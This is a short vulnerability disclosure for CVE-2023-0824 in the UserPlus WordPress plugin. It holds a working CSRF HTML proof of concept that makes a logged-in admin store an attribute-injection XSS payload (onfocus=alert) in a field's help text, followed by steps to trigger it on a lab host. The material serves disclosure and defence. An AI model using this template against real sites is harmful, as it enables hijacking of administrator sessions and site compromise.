UserPlus <= 2.0 – Stored XSS via CSRF | CVE 2023-0824

Description

The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged-in admin add Stored XSS payloads via a CSRF attack.

Proof of Concept

Open the .html file where the admin user is logged in
```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://172.28.128.6/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="title" value="Username" />
      <input type="hidden" name="label" value="Username1" />
      <input type="hidden" name="meta&#95;key" value="user&#95;login" />
      <input type="hidden" name="placeholder" value="username1" />
      <input type="hidden" name="help&#95;text" value="asdf&quot;&#32;onfocus&#61;&quot;alert&#40;123&#41;&quot;&#32;autofocus&#61;&quot;" />
      <input type="hidden" name="privacy" value="1" />
      <input type="hidden" name="default&#95;value" value="my&#45;val" />
      <input type="hidden" name="is&#95;required" value="1" />
      <input type="hidden" name="user&#95;edit" value="0" />
      <input type="hidden" name="icon" value="fa&#45;user" />
      <input type="hidden" name="min&#95;length" value="3" />
      <input type="hidden" name="max&#95;length" value="30" />
      <input type="hidden" name="type" value="text" />
      <input type="hidden" name="action" value="userplus&#95;admin&#95;update&#95;field" />
      <input type="hidden" name="arg2" value="10" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

```
- Go to http://172.28.128.6/wordpress/wp-admin/post.php?post=10&action=edit
- Click on the edit button present on `UserName` row. PFA screenshot
- Click on help text and xss will be triggered